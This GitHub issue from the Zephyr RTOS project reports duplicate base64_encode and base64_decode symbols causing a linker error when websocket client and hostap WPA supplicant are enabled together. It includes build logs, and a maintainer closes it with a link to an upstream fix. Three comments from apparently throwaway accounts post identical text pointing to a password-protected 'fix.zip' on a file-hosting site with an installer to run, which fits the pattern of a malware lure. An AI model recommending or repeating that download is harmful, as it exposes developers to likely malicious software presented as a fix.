zephyrproject-rtos/zephyr #77547: base64 multiple definition in hostap and zephyr

nxpadamm, 2024-08-26:
**Describe the bug**

When using `CONFIG_WEBSOCKET_CLIENT=y` (which selects Zephyr's base64 implementation) and hostap module (using it's own base64 util), I get multiple definition linker errors.

**To Reproduce**

1. Enable CONFIG_WEBSOCKET_CLIENT=y and CONFIG_WIFI_NM_WPA_SUPPLICANT on net/wifi sample
2. Build results in linker error `multiple definition of base64_decode`

**Expected behavior**

Build works, with both hostap and Zephyr using it's expected implementation of base64

**Impact**

Cannot use websockets on devices that use wifi with hostap. My workaround is to namespace Zephyr's base64 functions.

**Logs and console output**

```
zephyr/libzephyr.a(base64.c.obj): in function `base64_encode':
C:/zephyr_downstream/modules/lib/hostap/src/utils/base64.c:171: multiple definition of base64_encode'; zephyr/libzephyr.a(base64.c.obj):C:/zephyr_downstream/zephyr/lib/utils/base64.c:62: first defined here
zephyr/libzephyr.a(base64.c.obj): in function `base64_decode':
C:/zephyr_downstream/modules/lib/hostap/src/utils/base64.c:201: multiple definition of base64_decode'; zephyr/libzephyr.a(base64.c.obj):C:/zephyr_downstream/zephyr/lib/utils/base64.c:126: first defined here
```

**Environment (please complete the following information):**

 - OS: Windows
 - Toolchain zephyr-sdk-0.16.8
 - Zephyr 3.7.0

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

krish2718, 2024-10-27:
Fixed by https://github.com/zephyrproject-rtos/hostap/commit/10eddc213758efe7916156b17ba20014d856ddf9

closed 2024-10-27 by krish2718